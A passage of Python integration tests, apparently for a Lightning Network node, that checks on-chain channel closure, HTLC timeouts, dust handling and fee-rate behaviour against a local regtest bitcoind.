# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1 = node_factory.get_node(may_reconnect=True)
l2 = node_factory.get_node(disconnect=disconnects,
may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for normal set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output 0 of .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l1.daemon.wait_for_log('htlc 0: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l1.daemon.wait_for_log('htlc 1: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l1.daemon.wait_for_log('htlc 2: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore and HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
h = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h)
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h)
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h)
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h)
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# After at depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('openingd-chan#1: Handed peer, entering loop'.format(l1.info['id']))
l2.fund_channel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:0\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Check that the all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = txout['scriptPubKey']['addresses'][0]
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not VALGRIND:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
@flaky
@unittest.skipIf(not DEVELOPER, "needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind, executor):
l1 = node_factory.get_node(start=False)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 1000000, False)
# This will block, as l12 will send an error but l2 will retry.
